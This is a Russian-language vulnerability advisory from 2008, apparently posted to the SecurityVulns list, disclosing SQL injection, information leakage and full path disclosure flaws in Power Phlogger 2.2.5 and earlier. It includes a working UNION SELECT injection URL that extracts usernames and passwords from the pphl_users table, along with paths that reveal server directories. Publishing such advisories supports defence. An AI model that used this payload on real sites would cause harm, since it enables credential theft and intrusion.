Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability

  ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability

  OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerability

  BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:02.06.2008
Subject:New vulnerabilities in Power Phlogger

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых SQL Injection, Information Leakage и Full path
disclosure уязвимостях в Power Phlogger.

SQL Injection:

http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,
username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,
null%20from%20pphl_users%20limit%200,1&action=edit

Information Leakage:

http://site/robots.txt

В robots.txt указаны важные папки системы, что позволяет найти её ресурсы и выявить
другие Information Disclosure уязвимости.

Full path disclosure:

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Уязвима версия Power Phlogger 2.2.5 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2158/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru